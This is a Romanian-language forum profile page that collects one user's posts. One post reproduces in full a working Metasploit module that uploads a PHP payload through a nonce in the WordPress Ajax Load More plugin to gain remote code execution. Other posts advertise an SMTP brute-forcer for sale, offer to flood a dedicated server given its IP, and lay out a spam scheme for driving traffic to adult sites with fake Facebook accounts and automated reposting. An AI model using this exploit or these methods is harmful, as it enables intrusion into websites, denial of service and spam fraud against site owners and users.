Jump to content

iulik

Active Members
  • Posts

    702
  • Joined

  • Last visited

  • Days Won

    18

Everything posted by iulik

  1. Dac? tot tre sa pl?tim impozite, m?car sa nu le d?m chiar la stat, ar fi fain s? putem merge ?i s? ne pl?tim impozitele direct la o casa de copii orfani...
  2. @Jacksormwriter wants me dead pe twitter-ul lui.... R.I.P
  3. SMTP bruter (scris in python) $25 PP / BTC . Mai multe detalii PM
  4. Ai de plm ce oameni, cum sa dai reset ma la server, cine mortii lor se cred... Lasa-ne ip-ul serverului si ip-ul tau, pana maine ii dam flood de pica dedicatu din rack.
  5. Daca mai stiti alte metode de trafic, puteti sa lasati in comentarii si le pun eu un post cu @Mention .
  6. Upload-ul nu este cea mai buna metoda daca nu promovezi video-urile calumea, video-urile le promovezi pe forumuri (sa incerci sa nu arate a spam, gen mai postezi si alte chestii pe acele forumuri) sau poti sa spamezi jingling pe unele site-uri porn.
  7. Mi-am amintit inca ceva, faceti cat mai multe bloguri tumblr
  8. Metoda free: webhost si subdomeniu (puteti folosi domeniu daca aveti) de la easyxsites, pentru a converti traficul folosim plugrush si imagetwist. Metode de trafic: A) 000webhost + wordpress + wprobot + nextscripts configurat sa posteze pe vbulletin cate o poza cu href spre site-ul tau + poti folosi si tumblr si alte servicii (nu uita sa pui si hashtag-uri pentru alte servicii) Spam pe chat-ul de la imagefap (direct cu site-ul vostru sau urcati imagini cu watermark si le puneti pe chaturile lor), pentru mailuri folositi yopmail.com. C) Facebook fake account cu pizda buna, intrati pe grupuri pe facebook si pune-ti poze cu add me, strangeti multi prieteni / followeri si transformati cont-ul in pagina. D) Mai incercati metodele de mai sus. E) Cautati pe google "milf tumblr.com" (sau orice alt keyword) si faceti o lista cu site-urile gasite iar la sfarsit adaugati /rss (ex: muie.tumblr.com/rss) + faceti blog pe tumblr e.x: "milf next door" (fiti cat mai unici). Pasul urmator, cont pe https://ifttt.com/ si facem recipiente cu rss + tumblr si adaugam aici lista de rss-uri facute + punem hashtaguri care au acceasi legatura cu nisa, iar la descriere, desigur link la site-ul nostru. Links: https://www.plugrush.com/?ref=20013 (ref) easyXsites - Your Free Adult Host (non ref) ImageTwist - Free Image Hosting, Photo sharing & Earn Money (non ref) https://www.plugrush.com (non ref) Simplu si scurt, cautati pe google alte site-uri porn sa vedeti cum isi promoveaza alte persoane site-ul lor si faceti si voi acceasi chestie. Link-uri care te pot ajuta: http://www.blackhatworld.com/blackhat-seo/making-money/747458-methods-getting-targetted-visitors-your-adult-cpa-site-traffic-sources.html http://www.blackhatworld.com/blackhat-seo/making-money/801786-method-my-webcam-method-making-600-month.html
  9. http://i.imgur.com/CbUVJ0F.png Facuti din traficul care nu il converteste plugrush
  10. Salut, da, este adevarat, cu asta ne ocupam. Saltam hackerii care dau flood, noi suntem o subdivizie a SRI-ului numita "Futem lumea in gura".
  11. iulik

    Teapa cargus .

    tutorialevideo.info teapa, tutorialevideo.info frauda si tutorialevideo.info filme porno cu manguste sa incep acest comentariu pe care vreau sa il fac „super seo”.
  12. Î?i ofer eu o mânu?? de ajutor, poate te ajut? The Death Triangle [Triunghiul Mor?ii], Produced by Oficiul Na?ional Cinematografic, Antena 1, Studioul Cinematografic Bucure?ti, CineTV Film, Filmex; directed by Sergiu Nicolaescu; screenplay by Sergiu Nicolaescu and Corneliu Vadim Tudor. 1999; c .
  13. iulik

    Filme online HD

    Nu prea stiu cum se face asta, poti incerca cu un plugin ( https://ro.wordpress.org/plugins/super-rss-reader ).
  14. iulik

    Filme online HD

    Scoate din rss embed-urile, sa nu te trezesti ca iti fura altu filmele
  15. iulik

    doc & motzu hd

    Download : GirlShare - Download doc & motzu hd.rar
  16. @akarot la fel si mai sunt cativa, dar nu ii retin p.s: atunci cand faceti posturi despre cineva da-ti si voi mention..
  17. JPMorgan Hack — Three Men Charged in Biggest Bank Hack in History - The Hacker News
  18. Guvernul SUA a acuzat 3 hackeri, pentru cel mai mare caz de hacking in istoria financiar?. Cei 3 au fost acuza?i de hacking în mai multe institu?ii financiare, inclusiv JPMorgan Chase , potrivit oficialilor, a fost "cel mai mare furt de date de utilizator de la o institu?ie financiar? din SUA în istorie". JPMorgan Chase este una dintre cele mai mari b?nci din lume, care controleaz? activele totale în valoare de peste 2,59 trilioane de dolari. Hackerii au vizat 9 institu?ii financiare între 2012 ?i mijlocul anului 2015, inclusiv JPMorgan Chase ?i o publica?ie majora de ?tiri de afaceri. Bloomberg a raportat mar?i cei trei b?rbati, printre care Gery Shalon, Ziv Orenstein ?i Joshua Samuel Aaron au fost acuza?i de 23 de capete de acuzare (hacking, furt de identitate, fraudarea titlurilor de valoare, sp?lare de bani, ?.a.m.d). VIA
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server. }, 'Author' => [ 'Unknown', # Identify yourself || send an PR here 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '8209'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Ajax Load More 2.8.1.1', {}]], 'DisclosureDate' => 'Oct 10 2015', 'DefaultTarget' => 0 )) register_options( [ OptString.new('WP_USERNAME', [true, 'A valid username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class ) end def check check_plugin_version_from_readme('ajax-load-more', '2.8.1.2') end def username datastore['WP_USERNAME'] end def password datastore['WP_PASSWORD'] end def get_nonce(cookie) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 'vars_get' => { 'page' => 'ajax-load-more-repeaters' }, 'cookie' => cookie ) if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/ return Regexp.last_match[1] else return nil end end def exploit vprint_status("#{peer} - Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? vprint_status("#{peer} - Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? vprint_status("#{peer} - Trying to upload payload") # This must be default.php filename = 'default.php' print_status("#{peer} - Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 'vars_post' => { 'action' => 'alm_save_repeater', 'value' => payload.encoded, 'repeater' => 'default', 'type' => 'default', 'alias' => '', 'nonce' => nonce }, 'cookie' => cookie ) if res if res.code == 200 && res.body.include?('Template Saved Successfully') register_files_for_cleanup(filename) else fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end end
  20. Foloseste https://ifttt.com/ , e gratis !
×
×
  • Create New...